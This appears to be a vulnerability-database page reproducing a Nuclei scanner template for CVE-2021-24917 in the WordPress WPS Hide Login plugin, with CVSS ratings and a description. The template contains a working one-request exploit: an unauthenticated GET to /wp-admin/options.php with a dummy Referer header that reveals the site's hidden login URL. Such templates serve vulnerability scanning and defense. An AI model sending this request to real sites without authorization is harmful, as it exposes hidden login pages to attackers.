Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-24917
HistoryAug 31, 2022 - 7:45 p.m.

WordPress WPS Hide Login <1.9.1 - Information Disclosure

2022-08-3119:45:11
ProjectDiscovery
github.com
88
cve2021
wordpress
wp-plugin
unauth
wpscan
wpserveur

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.041 Low

EPSS

Percentile

92.2%

WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.

id: CVE-2021-24917

info:
  name: WordPress WPS Hide Login <1.9.1 - Information Disclosure
  author: akincibor
  severity: high
  description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.
  impact: |
    An attacker can gain sensitive information about the WordPress site, such as the login page URL.
  remediation: Fixed in version 1.9.1.
  reference:
    - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24917
    - https://wordpress.org/support/topic/bypass-security-issue/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24917
    cwe-id: CWE-863
    epss-score: 0.04098
    epss-percentile: 0.92139
    cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpserveur
    product: wps_hide_login
    framework: wordpress
  tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur

http:
  - raw:
      - |
        GET /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Referer: something

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(location), 'wp-login.php')"

      - type: word
        part: header
        words:
          - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'

    extractors:
      - type: kval
        kval:
          - location
# digest: 4b0a00483046022100c84c2cd344bcaff4decfba4969af0b615c69b0924f2e8a4c60567b9d62619cb7022100a31f6dfcf3ed63ba7e0837b07f2afdc9a82aef82b837cf35e065afa4ada3aae8:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.041 Low

EPSS

Percentile

92.2%